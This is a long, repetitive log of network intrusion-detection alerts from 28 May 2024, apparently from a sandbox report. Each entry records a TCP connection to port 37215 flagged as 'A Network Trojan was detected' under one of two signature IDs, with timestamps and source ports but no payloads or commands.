            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.831619
            SID:2835222
            Source Port:50266
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.290690
            SID:2835222
            Source Port:43928
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.857888
            SID:2829579
            Source Port:59968
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.509767
            SID:2835222
            Source Port:34946
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.664075
            SID:2835222
            Source Port:38206
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.855592
            SID:2829579
            Source Port:44488
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.871140
            SID:2835222
            Source Port:51300
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.054405
            SID:2835222
            Source Port:56744
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.775859
            SID:2829579
            Source Port:44094
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.376605
            SID:2829579
            Source Port:58984
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.459710
            SID:2829579
            Source Port:50680
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.731002
            SID:2835222
            Source Port:32844
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.955841
            SID:2835222
            Source Port:37602
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994798
            SID:2835222
            Source Port:58542
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:16.994776
            SID:2829579
            Source Port:39514
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.931600
            SID:2835222
            Source Port:39242
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.933244
            SID:2829579
            Source Port:32836
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.064539
            SID:2829579
            Source Port:60446
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.014680
            SID:2829579
            Source Port:39798
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.960779
            SID:2829579
            Source Port:46986
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.532402
            SID:2835222
            Source Port:57606
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.746931
            SID:2835222
            Source Port:49430
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.885744
            SID:2835222
            Source Port:59382
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.304207
            SID:2835222
            Source Port:53086
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.956467
            SID:2829579
            Source Port:47886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.669571
            SID:2829579
            Source Port:41804
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.854415
            SID:2829579
            Source Port:42990
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.582779
            SID:2829579
            Source Port:34956
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.505524
            SID:2835222
            Source Port:33144
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.932081
            SID:2829579
            Source Port:45612
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.719046
            SID:2829579
            Source Port:35650
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.933896
            SID:2835222
            Source Port:38638
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776299
            SID:2829579
            Source Port:56946
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.811258
            SID:2829579
            Source Port:51458
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:40.506661
            SID:2835222
            Source Port:38896
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.441497
            SID:2835222
            Source Port:50052
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.756637
            SID:2829579
            Source Port:58630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.843242
            SID:2829579
            Source Port:36866
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.772395
            SID:2829579
            Source Port:57484
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.437280
            SID:2829579
            Source Port:53892
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.543962
            SID:2835222
            Source Port:49568
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:47.602336
            SID:2835222
            Source Port:38564
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.459954
            SID:2835222
            Source Port:47224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.810636
            SID:2835222
            Source Port:43544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.055142
            SID:2835222
            Source Port:52170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.581970
            SID:2835222
            Source Port:52652
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776618
            SID:2829579
            Source Port:33230
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.742019
            SID:2829579
            Source Port:35910
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.552974
            SID:2835222
            Source Port:46494
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.729880
            SID:2829579
            Source Port:33698
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.812202
            SID:2829579
            Source Port:58816
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.578797
            SID:2835222
            Source Port:53322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.887354
            SID:2835222
            Source Port:56608
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:15.998904
            SID:2829579
            Source Port:34828
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.846992
            SID:2829579
            Source Port:42346
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.965216
            SID:2835222
            Source Port:47508
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.349832
            SID:2829579
            Source Port:56768
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.919397
            SID:2829579
            Source Port:41864
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.084488
            SID:2829579
            Source Port:33054
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.954083
            SID:2835222
            Source Port:35968
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.655829
            SID:2835222
            Source Port:33956
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.862953
            SID:2835222
            Source Port:48150
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.525784
            SID:2829579
            Source Port:46900
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.887419
            SID:2835222
            Source Port:39642
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.776476
            SID:2835222
            Source Port:60184
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.854001
            SID:2835222
            Source Port:48362
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.261099
            SID:2829579
            Source Port:52318
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026963
            SID:2835222
            Source Port:37340
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.892201
            SID:2835222
            Source Port:40600
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:15.964247
            SID:2829579
            Source Port:46306
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.031643
            SID:2835222
            Source Port:52732
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.676732
            SID:2835222
            Source Port:52296
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.500246
            SID:2835222
            Source Port:39118
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.936814
            SID:2829579
            Source Port:43296
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.583890
            SID:2829579
            Source Port:51780
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.855295
            SID:2835222
            Source Port:36046
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809638
            SID:2829579
            Source Port:57438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.038344
            SID:2829579
            Source Port:44498
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.748626
            SID:2835222
            Source Port:45854
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.936334
            SID:2829579
            Source Port:51660
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.279785
            SID:2835222
            Source Port:49940
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.940199
            SID:2835222
            Source Port:40700
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.712081
            SID:2829579
            Source Port:46060
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.990104
            SID:2835222
            Source Port:40044
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.063400
            SID:2829579
            Source Port:32872
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.990066
            SID:2835222
            Source Port:53944
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.020708
            SID:2835222
            Source Port:58014
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.815621
            SID:2829579
            Source Port:35570
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.553194
            SID:2829579
            Source Port:41910
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.903290
            SID:2829579
            Source Port:36378
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.052215
            SID:2835222
            Source Port:45632
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507059
            SID:2835222
            Source Port:53776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.065436
            SID:2835222
            Source Port:55588
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.790619
            SID:2835222
            Source Port:38522
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.757838
            SID:2829579
            Source Port:46890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.857943
            SID:2835222
            Source Port:58790
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.843591
            SID:2835222
            Source Port:60720
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.046456
            SID:2829579
            Source Port:59084
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.383586
            SID:2835222
            Source Port:39562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.712248
            SID:2835222
            Source Port:50802
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.048144
            SID:2835222
            Source Port:40692
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.916534
            SID:2835222
            Source Port:50284
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.597258
            SID:2829579
            Source Port:46914
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.525082
            SID:2835222
            Source Port:53906
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.508207
            SID:2829579
            Source Port:37746
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.618069
            SID:2835222
            Source Port:53268
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.755075
            SID:2835222
            Source Port:33774
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.929626
            SID:2829579
            Source Port:41808
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.882006
            SID:2835222
            Source Port:36212
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.904773
            SID:2829579
            Source Port:53000
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:40.487714
            SID:2829579
            Source Port:57524
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.350430
            SID:2829579
            Source Port:55092
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.723447
            SID:2829579
            Source Port:55934
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.926874
            SID:2829579
            Source Port:47536
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.905586
            SID:2835222
            Source Port:47300
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.334788
            SID:2829579
            Source Port:39606
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.744209
            SID:2829579
            Source Port:47440
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:01.873093
            SID:2835222
            Source Port:50582
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919674
            SID:2829579
            Source Port:41272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.759631
            SID:2835222
            Source Port:38962
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507970
            SID:2829579
            Source Port:54474
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.759957
            SID:2835222
            Source Port:43012
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.923645
            SID:2835222
            Source Port:47720
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.854755
            SID:2835222
            Source Port:42132
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:33.396349
            SID:2835222
            Source Port:53420
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.918829
            SID:2829579
            Source Port:57170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:37.482944
            SID:2835222
            Source Port:49700
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.774550
            SID:2829579
            Source Port:48292
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.928944
            SID:2829579
            Source Port:59262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.012377
            SID:2835222
            Source Port:60022
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.457372
            SID:2829579
            Source Port:36738
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.860429
            SID:2835222
            Source Port:58806
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.778901
            SID:2829579
            Source Port:54246
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.021119
            SID:2829579
            Source Port:45852
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994781
            SID:2829579
            Source Port:52778
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.313321
            SID:2829579
            Source Port:57424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.782367
            SID:2835222
            Source Port:46772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.870338
            SID:2829579
            Source Port:55460
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.893393
            SID:2829579
            Source Port:42090
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:38.486889
            SID:2829579
            Source Port:36124
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.748643
            SID:2829579
            Source Port:44392
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:48.641604
            SID:2835222
            Source Port:42300
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.052723
            SID:2829579
            Source Port:42658
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.824834
            SID:2829579
            Source Port:51354
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.084538
            SID:2835222
            Source Port:53620
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.309799
            SID:2835222
            Source Port:51708
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:17.000486
            SID:2835222
            Source Port:39796
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.729523
            SID:2835222
            Source Port:50392
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.605343
            SID:2829579
            Source Port:45670
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919462
            SID:2829579
            Source Port:38178
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.322742
            SID:2835222
            Source Port:36576
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.812648
            SID:2829579
            Source Port:41568
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.975259
            SID:2829579
            Source Port:55110
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862107
            SID:2829579
            Source Port:41562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.953397
            SID:2829579
            Source Port:55088
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.344311
            SID:2829579
            Source Port:60974
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.853229
            SID:2835222
            Source Port:53232
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.379675
            SID:2835222
            Source Port:46588
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.658285
            SID:2835222
            Source Port:34540
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.922193
            SID:2829579
            Source Port:58984
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.871259
            SID:2829579
            Source Port:54994
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.956069
            SID:2829579
            Source Port:43010
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.835867
            SID:2835222
            Source Port:36038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.026493
            SID:2829579
            Source Port:46494
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.881927
            SID:2829579
            Source Port:51690
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.544458
            SID:2829579
            Source Port:48560
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.916781
            SID:2829579
            Source Port:51690
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.810187
            SID:2835222
            Source Port:35858
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.965891
            SID:2835222
            Source Port:60966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:51.677463
            SID:2835222
            Source Port:54216
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.556690
            SID:2829579
            Source Port:32992
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.505552
            SID:2835222
            Source Port:42038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.560099
            SID:2829579
            Source Port:35824
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.881262
            SID:2835222
            Source Port:36794
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.961198
            SID:2835222
            Source Port:49468
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.936389
            SID:2829579
            Source Port:58572
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.565434
            SID:2835222
            Source Port:32874
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.818724
            SID:2829579
            Source Port:37844
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.738687
            SID:2835222
            Source Port:41760
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.849425
            SID:2835222
            Source Port:51138
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.740924
            SID:2835222
            Source Port:36590
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.062510
            SID:2835222
            Source Port:52432
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.927161
            SID:2835222
            Source Port:56066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.761094
            SID:2829579
            Source Port:46798
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.231129
            SID:2829579
            Source Port:56532
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:33.396676
            SID:2829579
            Source Port:55716
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869138
            SID:2835222
            Source Port:60692
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.317191
            SID:2835222
            Source Port:41406
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.859450
            SID:2829579
            Source Port:52070
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.927631
            SID:2829579
            Source Port:33214
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.508133
            SID:2835222
            Source Port:59666
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507738
            SID:2835222
            Source Port:50706
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.587322
            SID:2835222
            Source Port:50848
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:09.698164
            SID:2829579
            Source Port:50702
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.899775
            SID:2835222
            Source Port:60312
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.639521
            SID:2829579
            Source Port:44774
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.519031
            SID:2829579
            Source Port:36328
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
